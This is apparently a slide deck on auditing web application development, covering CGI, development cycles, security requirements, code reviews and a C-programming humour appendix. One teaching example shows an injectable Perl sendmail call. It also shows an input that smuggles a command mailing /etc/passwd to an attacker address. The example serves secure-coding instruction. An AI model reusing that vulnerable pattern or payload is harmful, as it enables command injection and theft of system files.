440 likes | 576 Views
Auditing the Development of Web-Based Applications. Jian Zhen. Overview. Overview of WWW and HTTP Web-based Application Concepts Overview of the Development Cycles Security Requirements Web-based Application Security Application Code Reviews. World-Wide-Web (WWW).
E N D
Auditing the Development of Web-Based Applications Jian Zhen
Overview • Overview of WWW and HTTP • Web-based Application Concepts • Overview of the Development Cycles • Security Requirements • Web-based Application Security • Application Code Reviews
World-Wide-Web (WWW) • Invented by Tim Berners-Lee and others at the European Laboratory for Particle Physics (CERN) • Based on hypertext--a system of embedding links in text to link to other text • The most popular way of linking to resources on the Internet
WWW (Cont.) • Hundres of millions of pages indexed by search engines • Tens of terabytes archived by Alexa • Hundreds of millions users on the Web
WWW and HTTP • Static Web Model
Common Gateway Interface (CGI) • Common • An open specification • Many languages • Gateway • Strength is not in what is does by itself • Methods to access other systems • Interface • Well defined way to call features
CGI (cont.) • A way of providing dynamic web content • Forms • Counters • Guest Books • Database Queries • Used by most of the web-based applications
Web Applications • Browsers: • Plug-ins • Applets • DHTML • etc • Server: • CGI • Servlets • ASP • NSAPI Internet CORBA/ODBC Static Pages Database
Web Applications • Client side • HTML/DHTML • JavaScript, VBScript, PerlScript • Java • ActiveX • Plug-ins
Web Applications • Server side • Frontend: CGIs (Perl, C/C++), Java Servlets, ISAPI, NSAPI, ASP, etc • Middleware: CORBA, ODBC, DCOM, etc • Backend: Oracle, Informix, Sybase, DB2, etc
Web Applications • Complex distributed, Client/Server applications • Many elements involved and integrated • Rapid development • Requires more planning, design, and control than “conventional” projects.
Web Development Cycles Analysis Design Prototyping Implementation Testing
Web Development Cycles • Analysis • Feasibility study • Identify requirements • Involvment: your requirements
Web Development Cycles • Design • Design specifications • Involvment: system interoperability, resiliency, capacity planning, mature technologies, security design
Business Requirement Existing and Proposed System Overview Hardware and Software Requirements System Schematic System Interoperability Operational cycle/Workflow System Modules Input-Output User Interface Prototypes Design Specification
Web Development Cycles • Prototyping • Most time-consuming stage • Coding • Build, review, and refine prototype • Involvement: coding standards, effective application development environment
Web Development Cycles • Testing • Unit/System test plans • Module/Unit testing • System integration testing • Involvement: test plans, effective testing environment, testing stages, code reviews
Web Development Cycles • Delivery/Implementation • Install systems • Train users • Acceptance testing • Involvement: effective implementation
Security Requirements • Privacy - All user information are protected • Authentication/Access Control- Only authorized users are allowed to access the resources • Integrity - User and application data cannot be tempered with • Auditing - Keeping audit logs and audit trails and ensuring their integrity
Privacy • Protecting users’ private information • SSN • Birthdates • Employee Ids • Passwords • Technologies • Encryption: DES, RSA, SSL • Local vs. Network
Authentication • Proof of Identity • Required to enforce access control and accountability, and achieve non-repudiation • Technologies • username/password • Smart Cards, SecurID • Biometrics
Access Control • Determine who is authorized to receive or modify information • Common mechanisms • Mandatory Access Control (MAC) • Owners cannot modify access list (SeOS) • Discretionary Access Control (DAC) • Owners are allowed to modify access (UNIX) • Role-based Access Control (RBAC) • Role granted provides necessary access
Auditing • The process of collecting and recording security-relevant activities on a system • After-the-fact technique • Audit logs are used as evidence
Data Encryption • Confidentiality • Scrambling data to unreadable format • Integrity • User and application data are not modified • Technologies • Public/Secret Key Encryption: RSA, DES • Digital Signatures: DSS • Hashes: MD5
Web-based Application Security • Security flaws occur when software bugs allow violation of security policy • Different security flaw present different threats • Opening backdoors • Stealing information or system resource • Destroying or tempering data
Where Do Flaws Exist? • Operating Systems • UNIX, NT • Support Software and Libraries • Compilers, C Libraries • Applications • CGI programs, Netscape, Internet Explorer, vi, Emacs, Sendmail, many others
Web-based Application Security • Different layers of security • Network security • Operating System security • Web server security • Application security • MUST PROTECT ALL LAYERS!!! • Rootshell gets defaced!
Web-based Application Security • Common Security Flaws • Insufficient Input Validations • Memory Cleansing, i.e. Cookie deletion on the client • Environmental Faults • Buffer Overflows • Race Conditions
Web-based Application Security • CGI Programming Example • What if we used this Perl code to send mail to an address given in a fill-out form? $mail_to= &get_name_from_input; #read the address open (MAIL, “| /usr/lib/sendmail $mail_to”); print MAIL “To: $mail_to\nFrom: me\n\nHello\n”; close MAIL;
CGI Example (cont.) • Look at the open() call open (MAIL, “| /usr/lib/sendmail $mail_to”); • What if the user entered jerk@nowhere.com;mail evilone@chaos.org</etc/passwd; • Look at the open again! /usr/lib/sendmail jerk@nowhere.com; mail evilone@chaos.org</etc/passwd;
Web-based Application Security • Never Assume That: • The input to a field from a selection list will be one of the items on the list • A browser will never send more than the maximum length of an input field • The field in the QUERY_STRING variable will match the ones on the page • The QUERY_STRING variable will correspond to something that is within valid HTTP specs
Web-based Application Security • AVOID shell programming! • Always use full pathnames for both commands and filenames, or explicitly set the PATH variable • Don’t depend on the current directory • Use and check all return codes from system calls
Web-based Application Security • Have internal consistency checking code • Include lots of logging • Review publicly available programs • Review error logs • Make the critical portion of the program as simple as possible • Read through the code
Code Reviews • Code Inspection • Formal • Walk Through • Code Reading • Informal
Code Reviews • Code Inspection • Formal code review • Emphasize on defect detection, not correction • Reviewers prepare beforehand • Distinct roles are assigned
Code Reviews • Walkthroughs • Usually hosted and moderated by the author of the design or code under review • To improve the technical quality of a program • Emphasize on error detection
Code Reviews • Code Reading • Read source code and look for errors • Comment on design, style, readability, maintainability, and efficiency • Informal meetings • Probably most common in web-based application environment
Appendix • The Ten Commandments for C Programmers
The Ten Commandments for C Programmers • Thou shalt run lint frequently and study its pronouncements with care, for verily its perception and judgement oft exceed thine. • Thou shalt not follow the NULL pointer, for chaos and madness await thee at its end.
The Ten Commandments for C Programmers (cont.) • Thou shalt cast all function arguments to the expected type if they are not of that type already, een when thou are convinced that this is unnecessary, lest the take cruel vengeance upon thee when thou least expect it. • If thy header files fail to declare the return types of thy library functions, thou shalt declare them thyself with the most meticulous care, lest grievous harm befall thy program.
The Ten Commandments for C Programmers (cont.) • Thou shalt check the array bounds of all strings (indeed, all arrays,) for surely where thou typest “foo” someone someday shall type “supercalifragilisticexpialidocious.” • If a function be advertised to return an error code in the event of difficulties, thou shalt check for that code, yea, even though the checks triple the size of thy code and produce aches in thy typing fingers, for if thou thinkest “it cannot happen to me,” the gods shall surely punish thee for thy arrogance.
The Ten Commandments for C Programmers (cont.) • Thou shalt study thy libraries and strive not to re-invent them without cause, that thy code may be short and readable and thy days pleasant and productive. • Thou shalt make thy program’s purpose and structure clear to thy fellow man by using the One True Brace Style, even if thou likest it not, for thy creativity is better used in solving problems than in creating beautiful new impediments to understanding.
The Ten Commandments for C Programmers (cont.) • Thy external identifiers shall be unique in the first six characters, though this harsh discipline be irksome and the years of its necessity stretch before thee seemingly without end, lest thou tear thy hair out and go mad on that fateful day when thou desirest to make thy program run on an old system. • Thou shalt foreswear, renounce, and abjure the vile heresy which claimeth that “All the world’s a VAX,” and have no commerce with the benighted heathens who cling to this barbarous belif, that the days of thy program may be long even though the days of thy current machine be short.